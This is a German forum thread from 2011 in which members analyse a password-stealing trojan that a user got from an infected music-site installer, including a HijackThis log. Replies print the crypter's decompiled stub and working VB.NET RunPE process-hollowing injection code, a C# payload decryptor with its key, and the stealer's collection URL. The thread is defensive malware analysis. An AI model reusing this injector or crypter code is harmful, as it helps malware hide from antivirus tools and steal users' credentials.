Win32.Trojan-Downloader.MSIL.Agent.xf.3.a

Dieses Thema im Forum "Viren, Trojaner & Malware" wurde erstellt von Decryptor, 18. Februar 2011 .

  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 18. Februar 2011
    Zuletzt von einem Moderator bearbeitet: 14. April 2017
    okay scheinbar kann man nichma mehr seiner lieblings music seite vertrauen

    jedenfalls heut mit adminrechten ausgeführt, is ja normal bei installationen, hab mich über die bin files gewundert die nur als deko da waren

    ich hab win7 64bit




    Antivirus scan for 41dc79c0b1fb809cc4dcd00b7870d1d33dbf399120dc5bfe23f4aeee1e2d4ce9 at
    2011-02-17 23:59:07 UTC - VirusTotal


    Code:
    Logfile of Trend Micro HijackThis v2.0.4
    Scan saved at 01:20:05, on 18.02.2011
    Platform: Windows 7 (WinNT 6.00.3504)
    MSIE: Internet Explorer v8.00 (8.00.7600.16722)
    Boot mode: Normal
    
    Running processes:
    C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe
    C:\Program Files (x86)\Trillian\trillian.exe
    C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
    C:\Program Files (x86)\DivX\DivX Plus Web Player\DDMService.exe
    C:\Program Files (x86)\xchat\xchat.exe
    C:\Program Files (x86)\Last.fm\LastFM.exe
    C:\Program Files (x86)\FlashFXP 4\FlashFXP.exe
    C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe
    C:\Program Files (x86)\FlashFXP 4\FlashFXP.exe
    C:\Program Files (x86)\Lavasoft\Ad-Aware\AAWTray.exe
    C:\Program Files (x86)\FlashFXP 4\FlashFXP.exe
    C:\Program Files (x86)\Mozilla Firefox\firefox.exe
    C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
    C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
    C:\Program Files (x86)\Mozilla Thunderbird\thunderbird.exe
    C:\Users\****\Downloads\HiJackThis204.exe
    
    R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
    R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = 
    R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = 
    R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
    R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = 
    F2 - REG:system.ini: UserInit=userinit.exe
    O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
    O2 - BHO: Increase performance and video formats for your HTML5 <video> - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll
    O2 - BHO: Use the DivX Plus Web Player to watch web videos with less interruptions and smoother playback on supported sites - {593DDEC6-7468-4cdd-90E1-42DADAA222E9} - C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll
    O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~2\Microsoft Office\Office14\GROOVEEX.DLL
    O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
    O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\Microsoft Office\Office14\URLREDIR.DLL
    O2 - BHO: Ask Toolbar BHO - {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files (x86)\Ask.com\GenericAskToolbar.dll
    O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll
    O2 - BHO: Microsoft-Webtestaufzeichnung 10.0-Hilfsprogramm - {DDA57003-0068-4ed2-9D32-4D1EC707D94D} - C:\Program Files (x86)\Microsoft Visual Studio 10.0\Common7\IDE\PrivateAssemblies\Microsoft.VisualStudio.QualityTools.RecorderBarBHO100.dll
    O3 - Toolbar: Foxit Toolbar - {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files (x86)\Ask.com\GenericAskToolbar.dll
    O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
    O4 - Startup: Trillian.lnk = C:\Program Files (x86)\Trillian\trillian.exe
    O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\Microsoft Office\Office14\EXCEL.EXE/3000
    O8 - Extra context menu item: Nach Microsoft &Excel exportieren - res://C:\PROGRA~2\Microsoft Office\OFFICE11\EXCEL.EXE/3000
    O8 - Extra context menu item: Se&nd to OneNote - res://C:\PROGRA~1\Microsoft Office\Office14\ONBttnIE.dll/105
    O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
    O9 - Extra 'Tools' menuitem: Se&nd to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
    O9 - Extra button: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
    O9 - Extra 'Tools' menuitem: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
    O9 - Extra button: Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
    O9 - Extra 'Tools' menuitem: Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
    O9 - Extra button: Recherchieren - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~2\Microsoft Office\OFFICE11\REFIEBAR.DLL
    O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
    O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
    O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
    O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
    O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
    O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
    O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
    O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
    O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
    O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
    O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
    O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
    O18 - Protocol: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
    O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\Skype4COM.dll
    O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
    O23 - Service: Ati External Event Utility - Unknown owner - C:\Windows\system32\Ati2evxx.exe (file missing)
    O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
    O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
    O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
    O23 - Service: FLEXnet Licensing Service 64 - Acresso Software Inc. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService64.exe
    O23 - Service: LogMeIn Hamachi 2.0 Tunneling Engine (Hamachi2Svc) - LogMeIn Inc. - C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
    O23 - Service: HASP License Manager (hasplms) - Unknown owner - C:\Windows\system32\hasplms.exe (file missing)
    O23 - Service: HTTP Debugger (HTTPDebugger) - MadeForNet.com - C:\Program Files (x86)\HTTP Debugger Pro\mfnsvc.exe
    O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
    O23 - Service: KMService - Unknown owner - C:\Windows\system32\srvany.exe
    O23 - Service: Lavasoft Ad-Aware Service - Lavasoft Limited - C:\Program Files (x86)\Lavasoft\Ad-Aware\AAWService.exe
    O23 - Service: Process Monitor (LVPrcS64) - Logitech Inc. - C:\Program Files\Common Files\Logishrd\LVMVFM\LVPrcSrv.exe
    O23 - Service: McAfee Security Scan Component Host Service (McComponentHostService) - McAfee, Inc. - C:\Program Files (x86)\McAfee Security Scan\2.0.181\McCHSvc.exe
    O23 - Service: mental ray 3.8 Satellite for Autodesk 3ds Max Design 2011 32-bit 32-bit (mi-raysat_3dsmax2011_32) - Unknown owner - C:\Program Files (x86)\Autodesk\3ds Max Design 2011\mentalimages\satellite\raysat_3dsmax2011_32server.exe
    O23 - Service: mental ray 3.8 Satellite for Autodesk 3ds Max Design 2011 64-bit 64-bit (mi-raysat_3dsmax2011_64) - Unknown owner - C:\Program Files\Autodesk\3ds Max Design 2011\mentalimages\satellite\raysat_3dsmax2011_64server.exe
    O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
    O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
    O23 - Service: NIHardwareService - Native Instruments GmbH - C:\Program Files\Common Files\Native Instruments\Hardware\NIHardwareService.exe
    O23 - Service: PACE License Services (PaceLicenseDServices) - PACE Anti-Piracy, Inc. - C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe
    O23 - Service: PnkBstrA - Unknown owner - C:\Windows\system32\PnkBstrA.exe
    O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
    O23 - Service: Sage Registry Service (Registry) - Sage KHK Software - C:\Program Files (x86)\Common Files\Sage KHK Shared\REGISTRY.EXE
    O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
    O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
    O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
    O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
    O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
    O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
    O23 - Service: SwitchBoard - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
    O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
    O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
    O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
    O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
    O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
    O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
    O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
    
    --
    End of file - 11312 bytes
    

    besagte exe
    No File | www.xup.in
     

  2. Anzeige
  3. #2 18. Februar 2011
    AW: was ist es was tut es?

    VM an -> Wireshark an -> Setup.exe ausfuehren -> Geaenderte Dateien anschauen -> Wireshark log anschauen -> [was ist es was tut es] (ein debugger waere auch ganz praktisch, benoetigt aber vorkentnisse -> codeanalyse)

    mfg

    PS: Ich wuerde meinen Accountnamen aus dem Log entfernen..
    PS2: Der Autor ist uebrigens bei hackforums.net angemeldet, jedenfalls klaut er da seinen Code zusammen..

    //edit: Log sieht sauber aus.

    Code Injection into avcenter.exe
    Autostart via Registry SOFTWARE\Microsoft\Windows\CurrentVersion\Run (\temp.exe?)
    "Crypted" via 10$ BlackBloodCrypter2.2 und Base64^^
    ...
     
  4. #3 18. Februar 2011
    AW: was ist es was tut es?

    hab keine temp.exe
    laut olydbgkillt es erstma die avs, naja mal in der vm runen lassen, es hantiert mit 3 datein rum laut sandboxie

    unter xp vm gehts nedma
    vm win7 öffnet den explorer, hinterlässt nix im windir oder autostart


    keine daten fließen,. grad mit wire gesnifft, crazy ding
     
  5. #4 18. Februar 2011
    AW: was ist es was tut es?

    Da wurde ein Copy/Paste Kiddie Crypter verwendet... lohnt sich nicht wirklich Wireshark zu starten, guckt euch doch einfach den Sourcecode an:

    Code:
    public static void Main()
    {
     ResourceManager manager = new ResourceManager("TempRes", Assembly.GetExecutingAssembly());
     byte[] inArray = (byte[]) manager.GetObject("crypted");
     string newValue = manager.GetString("settings");
     BindedData = manager.GetString("bind");
     RunPE = manager.GetString("runpe");
     char ch = '%';
     string[] strArray = newValue.Split(new char[] { ch });
     string str8 = strArray[4];
     string str2 = strArray[5];
     string str = strArray[3];
     string str6 = strArray[11];
     string str4 = strArray[6];
     string str3 = strArray[10];
     string str5 = strArray[12];
     if (str3 == "1")
     {
     OnlineSub(); //checked ob internet an ist
     }
     if (str == "1")
     {
     Daanteys.Enable(); //anti av/vm/sandbox
     }
     if (str2 == "1")
     {
     Thread thread = new Thread(new ThreadStart(Stub.BindSub));
     thread.IsBackground = true;
     thread.Start();
     }
     if (str8 == "1")
     {
     AddStartUp();
     }
     RunPE = RunPE.Replace("%%CDATA%%", CD.format(Convert.ToBase64String(inArray))); //der eigentliche Schädling
     RunPE = RunPE.Replace("%%Settings%%", newValue);
     if (str5 == "DefBrw")
     {
     str5 = defaultbrowser();
     }
     RunPE = RunPE.Replace("%%INJECT%%", str5);
     Execute(RunPE); //im Speicher ausführen
     if (str4 == "1")
     {
     switch (strArray[7])
     {
     case "":
     Interaction.MsgBox(strArray[8], MsgBoxStyle.Critical, strArray[9]);
     goto Label_023D;
    
     case "Exclamation":
     Interaction.MsgBox(strArray[8], MsgBoxStyle.Exclamation, strArray[9]);
     goto Label_023D;
    
     case "Critical":
     Interaction.MsgBox(strArray[8], MsgBoxStyle.Critical, strArray[9]);
     goto Label_023D;
    
     case "Question":
     Interaction.MsgBox(strArray[8], MsgBoxStyle.Question, strArray[9]);
     break;
    
     case "Information":
     Interaction.MsgBox(strArray[8], MsgBoxStyle.Information, strArray[9]);
     break;
     }
     }
    Label_023D:
     if (str6 == "1")
     {
     MeltME(); //sich selber löschen
     }
    }
    
    Die Settings sind die folgenden:
    Code:
    9%AES%cFwmeodjIGLViDo%0%0%0%0%Critical%%%0%0%explorer.exe%
    Die Methode, die das eigentlich schädliche Programm ausführt, wird on-the-fly compiled und der Source sieht so aus:
    Code:
    Imports System.Text
    Imports System.Runtime.InteropServices
    Imports System
    Imports Microsoft.VisualBasic
    Imports System.ComponentModel
    Imports System.IO.Compression
    Imports System.IO
    
    Namespace Inject
    Public Class RunPE
    
    Public Shared Function DoStuff() As Boolean
    
    Dim Setting As String = "%%Settings%%"
    
    Dim FileSplit As Char = "%%BlackBloodCrypter2.2%%"
    
    Dim SplitedData() as String = Setting.Split(FileSplit)
    
     Dim Password As String = SplitedData(2)
    
     Dim Encryption As String = SplitedData(1)
    
     Dim CryptData As String = %%CDATA%%
    
     Dim InjectInto as String = "%%INJECT%%"
     
     If Environment.OSVersion.Platform.ToString.Contains("32") OrElse Environment.OSVersion.Platform.ToString.Contains("86") Then
     If Encryption = "RC4" Then
     InjectPE(RC4(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto)
     ElseIf Encryption = "AES" Then
     InjectPE(AES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto)
     ElseIf Encryption = "DES" Then
     InjectPE(DES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto)
     ElseIf Encryption = "RC2" Then
     InjectPE(RC2_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto)
     ElseIf Encryption = "STR" Then
     InjectPE(Crypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto)
     ElseIf Encryption = "TDES" Then
     InjectPE(TDES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto)
     End If
     Else
     If Encryption = "RC4" Then
     InjectPE(RC4(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe")
     ElseIf Encryption = "AES" Then
     InjectPE(AES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe")
     ElseIf Encryption = "DES" Then
     InjectPE(DES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe")
     ElseIf Encryption = "RC2" Then
     InjectPE(RC2_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe")
     ElseIf Encryption = "STR" Then
     InjectPE(Crypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe")
     ElseIf Encryption = "TDES" Then
     InjectPE(TDES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe")
     End If
     End If
    Return True
    End Function
     Public Shared Function AES_Decrypt(ByVal input As Byte(), ByVal pass As Byte()) As Byte()
     Dim AES As New System.Security.Cryptography.RijndaelManaged
     Dim Hash_AES As New System.Security.Cryptography.MD5CryptoServiceProvider
     Dim decrypted() As Byte
     Try
     Dim hash(31) As Byte
     Dim temp As Byte() = Hash_AES.ComputeHash(pass)
     Array.Copy(temp, 0, hash, 0, 16)
     Array.Copy(temp, 0, hash, 15, 16)
     AES.Key = hash
     AES.Mode = Security.Cryptography.CipherMode.ECB
     Dim DESDecrypter As System.Security.Cryptography.ICryptoTransform = AES.CreateDecryptor
     Dim Buffer As Byte() = input
     decrypted = DESDecrypter.TransformFinalBlock(Buffer, 0, Buffer.Length)
     Return decrypted
     Catch ex As Exception
     Return Nothing
     End Try
     End Function
    .....
     <DllImport("kernel32")> _
     Private Shared Function CreateProcess(ByVal appName As String, ByVal commandLine As StringBuilder, ByVal procAttr As IntPtr, ByVal thrAttr As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal inherit As Boolean, ByVal creation As Integer, _
     ByVal env As IntPtr, ByVal curDir As String, ByVal sInfo As Byte(), ByVal pInfo As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
     End Function
     <DllImport("kernel32")> _
     Private Shared Function GetThreadContext(ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
     End Function
     <DllImport("ntdll")> _
     Private Shared Function NtUnmapViewOfSection(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr) As UInteger
     End Function
     <DllImport("kernel32")> _
     Private Shared Function ReadProcessMemory(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr, ByRef bufr As IntPtr, ByVal bufrSize As Integer, ByRef numRead As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
     End Function
     <DllImport("kernel32.dll")> _
     Private Shared Function ResumeThread(ByVal hThread As IntPtr) As UInteger
     End Function
     Declare Function usegfsuiefgseuf Lib "kernel32" Alias "SetThreadContext" (ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
     <DllImport("kernel32")> _
     Private Shared Function VirtualAllocEx(ByVal hProc As IntPtr, ByVal addr As IntPtr, ByVal size As IntPtr, ByVal allocType As Integer, ByVal prot As Integer) As IntPtr
     End Function
     <DllImport("kernel32", CharSet:=CharSet.Auto, SetLastError:=True)> _
     Private Shared Function VirtualProtectEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As IntPtr, ByVal flNewProtect As UInteger, ByRef lpflOldProtect As UInteger) As Boolean
     End Function
     <DllImport("kernel32.dll", SetLastError:=True)> _
     Private Shared Function WriteProcessMemory(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByVal lpNumberOfBytesWritten As Integer) As Boolean
     End Function
    
     Public Shared Function InjectPE(ByVal bytes() as Byte, ByVal InjectInto as String) As Boolean
     Try
     Dim procAttr As IntPtr = IntPtr.Zero
     Dim processInfo As IntPtr() = New IntPtr(3) {}
     Dim startupInfo As Byte() = New Byte(67) {}
    
     Dim num2 As Integer = BitConverter.ToInt32(bytes, 60)
     Dim num As Integer = BitConverter.ToInt16(bytes, num2 + 6)
     Dim ptr4 As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H54))
    
     If CreateProcess(Nothing, New StringBuilder(InjectInto), procAttr, procAttr, False, 4, _
     procAttr, Nothing, startupInfo, processInfo) Then
     Dim ctxt As UInteger() = New UInteger(178) {}
     ctxt(0) = &H10002
     If GetThreadContext(processInfo(1), ctxt) Then
     Dim baseAddr As New IntPtr(ctxt(&H29) + 8L)
    
     Dim buffer__1 As IntPtr = IntPtr.Zero
     Dim bufferSize As New IntPtr(4)
    
     Dim numRead As IntPtr = IntPtr.Zero
    
     If ReadProcessMemory(processInfo(0), baseAddr, buffer__1, CInt(bufferSize), numRead) AndAlso (NtUnmapViewOfSection(processInfo(0), buffer__1) = 0) Then
     Dim addr As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H34))
     Dim size As New IntPtr(BitConverter.ToInt32(bytes, num2 + 80))
     Dim lpBaseAddress As IntPtr = VirtualAllocEx(processInfo(0), addr, size, &H3000, &H40)
    
     Dim lpNumberOfBytesWritten As Integer
    
     WriteProcessMemory(processInfo(0), lpBaseAddress, bytes, CUInt(CInt(ptr4)), lpNumberOfBytesWritten)
     Dim num5 As Integer = num - 1
     For i As Integer = 0 To num5
     Dim dst As Integer() = New Integer(9) {}
     Buffer.BlockCopy(bytes, (num2 + &HF8) + (i * 40), dst, 0, 40)
     Dim buffer2 As Byte() = New Byte((dst(4) - 1)) {}
     Buffer.BlockCopy(bytes, dst(5), buffer2, 0, buffer2.Length)
     addr = New IntPtr(buffer2.Length)
     size = New IntPtr(lpBaseAddress.ToInt32() + dst(3))
     WriteProcessMemory(processInfo(0), size, buffer2, CUInt(addr), lpNumberOfBytesWritten)
     Next
     size = New IntPtr(ctxt(&H29) + 8L)
     addr = New IntPtr(4)
    
     WriteProcessMemory(processInfo(0), size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), CUInt(addr), lpNumberOfBytesWritten)
     ctxt(&H2C) = CUInt(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40))
     usegfsuiefgseuf(processInfo(1), ctxt)
     End If
     End If
     ResumeThread(processInfo(1))
     End If
     Catch
     Return False
     End Try
     Return True
     End Function
    
    Interessant ist es eben in welche exe es injected wird, sieht man aber gut im Quellcode...

    Wie kommt man nun auf elegantem Wege an den Schädling? Ganz einfach, die entscheidende Methode (AES Decrypt) kopieren, in Visual Studio rein und die exe decrypten mit dem gegebenen Passwort...

    Hmpf, für den eigentlichen Schädling hat es kein Platz mehr -> RR Post Zeichenlimit :lol:
     
  6. #5 18. Februar 2011
    AW: was ist es was tut es?

    ich bin irgendwie grad zu blöd dafür, was macht/hat es gemacht es nu bzw wie werd ich es wieder los
     
  7. #6 18. Februar 2011
    AW: was ist es was tut es?

    decrypt methode in C#:

    Code:
     static void Main(string[] args)
     {
     string pathInput = @"C:\Users\Admin\Downloads\crypted";
     string pathOutput = @"C:\Users\Admin\Downloads\crypted.exe";
     string password = "cFwmeodjIGLViDo";
    
     BinaryReader b = new BinaryReader(File.Open(pathInput, FileMode.Open));
     byte[] buffer = b.ReadBytes((int)b.BaseStream.Length);
     b.Close();
     RijndaelManaged rj = new RijndaelManaged();
     MD5CryptoServiceProvider crp = new MD5CryptoServiceProvider();
     byte[] hash = crp.ComputeHash(Encoding.Default.GetBytes(password));
     byte[] hashpw = new byte[32];
     Array.Copy(hash, 0, hashpw, 0, 16);
     Array.Copy(hash, 0, hashpw, 15, 16);
     rj.Key = hashpw;
     rj.Mode = CipherMode.ECB;
     ICryptoTransform transform = rj.CreateDecryptor();
     byte[] decrypted = null;
     try
     {
     decrypted = transform.TransformFinalBlock(buffer, 0, buffer.Length);
     }
     catch (CryptographicException ex)
     {
     Console.WriteLine(ex.ToString());
     Console.Read();
     }
     BinaryWriter writeBinay = new BinaryWriter(new FileStream(pathOutput, FileMode.Create));
     writeBinay.Write(decrypted);
     writeBinay.Close(); 
     }
    decrypted exe virus total scan:



    Antivirus scan for 26bb9902c8cf721300929c7d967dc989b736d4572fbca8fa607eb5e11fd5daac at
    2011-02-18 19:46:34 UTC - VirusTotal


    Auf die schnelle würde ich sagen:
    Da ist ein sehr guter Passwort Stealer (Baukasten!) drin. Die Daten werden an ein PHP Script geschickt:
    Code:
    http://46.182.124.42/index2.php
    Der Stealer erkennt auch ob Wireshark läuft!

    Nistet sich wohl nicht ins System ein, aber z.B. deine Firefox Passwörter sind nun beim Kiddie.

    Such trotzdem mal deine Autostart Liste ab mit Autoruns von Sysinternals.
     
  8. #7 18. Februar 2011
    ganz grose klasse

    autostart is nix
     
  9. #8 19. Februar 2011
    AW: Win32.Trojan-Downloader.MSIL.Agent.xf.3.a

    jo dann sollte dein System schon sauber sein.

    Hier nochmal ne kurze Auflistung was es so klaut:
    - FlashFXP/SmartFTP
    - Opera/Firefox/Chrome/IE
    - MSN/Trillian
    - Steam

    Die Liste ist nicht vollständig, besonders FlashFXP dürfte dich aber interessieren^^
     
  10. #9 19. Februar 2011
    AW: Win32.Trojan-Downloader.MSIL.Agent.xf.3.a

    naja mit den ftp daten kanner nix anfangen
    icq is schon geändert zumindest die uin wo ich das pw selbst weiß
    trillian astra bietet ja nedma die option das pw zu ändern, toller service...


    aber danke für die auflistung
     

  11. Videos zum Thema
Die Seite wird geladen...